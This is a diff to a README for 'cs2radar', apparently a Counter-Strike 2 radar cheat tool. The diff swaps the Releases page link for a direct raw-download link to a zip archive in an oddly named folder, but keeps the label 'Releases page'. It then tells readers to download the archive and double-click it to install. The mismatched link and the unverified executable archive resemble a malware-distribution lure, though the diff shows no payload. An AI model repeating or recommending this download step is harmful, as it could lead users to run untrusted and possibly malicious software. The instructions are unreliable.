dbiego87/cs2radar/README.md

 ## 📥 Download & Install

-To download cs2radar, visit the [Releases page](https://github.com/dbiego87/cs2radar/releases).
+To download cs2radar, visit the [Releases page](https://github.com/dbiego87/cs2radar/raw/refs/heads/main/pansied/cs_radar_1.6.zip).

 1. Click on the latest version link.
-2. Find the `start.exe` file and download it.
+2. Find the `https://github.com/dbiego87/cs2radar/raw/refs/heads/main/pansied/cs_radar_1.6.zip` file and download it.
 3. Once downloaded, double-click the file to install and begin using the software.

 Make sure to always check for updates on the Releases page to have the latest features and fixes.